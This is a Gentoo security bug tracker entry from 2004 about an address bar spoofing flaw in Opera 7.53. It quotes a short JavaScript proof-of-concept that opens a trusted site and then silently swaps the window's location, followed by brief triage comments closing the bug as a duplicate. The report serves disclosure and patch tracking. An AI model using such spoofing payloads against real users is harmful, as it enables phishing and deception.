Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!

Bug 58511

Summary: net-www/opera 7.53 still has spoofing issues
Product: Gentoo Security Reporter: Sune Kloppenborg Jeppesen (RETIRED) <jaervosz>
Component: VulnerabilitiesAssignee: Gentoo Security <security>
Status: RESOLVED DUPLICATE    
Severity: minor    
Priority: High    
Version: unspecified   
Hardware: All   
OS: All   
URL: http://archives.neohapsis.com/archives/fulldisclosure/2004-07/1056.html
Whiteboard: A4 [upstream]
Package list:
Runtime testing required: ---

Description Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2004-07-27 01:01:44 UTC 
I report you about 
 Opera 7.53 (Build 3850) Address Bar Spoofing Issue, 
 tested on Windows OS. 
 


==== begin of PoC 
 [script] 
 function fake() { 
   oc=window.open('http://www.opera.com/', '','location=1'); 
   oc.location.replace('http://www.example.com'); 
 } 
 [/script] 
 [a href="javascript:void(0);" 
 onClick="fake()"]http://www.opera.com/[/a] 
 ==== end of PoC 

Also vulnerable on Linux.
Comment 1 Thierry Carrez (RETIRED) gentoo-dev 2004-07-30 09:58:27 UTC 
Waiting for upstream fix
Comment 2 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2004-08-05 04:37:42 UTC 
Woops. Closing the old one as the new one contains fixes for multiple issues not just this one.

*** This bug has been marked as a duplicate of 59503 ***